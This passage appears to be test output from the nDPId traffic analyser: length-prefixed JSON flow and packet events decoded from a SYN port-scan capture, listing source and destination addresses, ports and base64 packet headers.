-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs7fQAAC4GLH6sEAAIQA2GNIzTF2XdU4MZAAAAAGACDAAVJwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsqdoAADQGapisEAAIQA2GNIzTBEXdU4MZAAAAAGACBAAwRwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs5xkAADoGJ1msEAAIQA2GNIzTCindU4MZAAAAAGACDAAiYwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4kAADIGsumsEAAIQA2GNIzTA+rdU4MZAAAAAGACDAAoogAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsMEoAADMG5SisEAAIQA2GNIzTB9TdU4MZAAAAAGACEAAguAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs9IQAACgGK+6sEAAIQA2GNIzTAiHdU4MZAAAAAGACBAAyawAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsPqUAACkG4M2sEAAIQA2GNIzTBBvdU4MZAAAAAGACCAAscQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAs0uwAACgGTYasEAAIQA2GNIzTDkvdU4MZAAAAAGACBAAmQQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsk78AADoGerOsEAAIQA2GNIzTE8TdU4MZAAAAAGACDAAYyAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsgW4AADIGlQSsEAAIQA2GNIzTRnjdU4MZAAAAAGACDADmEwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsvXkAACYGZPmsEAAIQA2GNIzTFADdU4MZAAAAAGACDAAYjAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsehoAADYGmFisEAAIQA2GNIzTAfTdU4MZAAAAAGACDAAqmAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAs6wMAACUGOG+sEAAIQA2GNIzThwvdU4MZAAAAAGACCACpgAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQUAADgG622sEAAIQA2GNIzTGuHdU4MZAAAAAGACBAAZqwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ0wAADYGzyasEAAIQA2GNIzTA4LdU4MZAAAAAGACDAApCgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsO3sAADAG3PesEAAIQA2GNIzTBIzdU4MZAAAAAGACBAAwAAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsDxoAAC0GDFmsEAAIQA2GNIzTH0rdU4MZAAAAAGACCAARQgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsJpAAADIG7+KsEAAIQA2GNIzTxnDdU4MZAAAAAGACDABmGwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsddgAADIGoJqsEAAIQA2GNIzTCP3dU4MZAAAAAGACDAAjjwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsId8AADoG7JOsEAAIQA2GNIzTJZLdU4MZAAAAAGACDAAG+gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsc6IAACoGqtCsEAAIQA2GNIzTrZvdU4MZAAAAAGACDAB+8AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAspioAAC0GdUisEAAIQA2GNIzTOGndU4MZAAAAAGACCAD4IgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsiV0AADMGjBWsEAAIQA2GNIzTELfdU4MZAAAAAGACEAAX1QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsDLwAADEGCresEAAIQA2GNIzTH\/TdU4MZAAAAAGACCAAQmAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 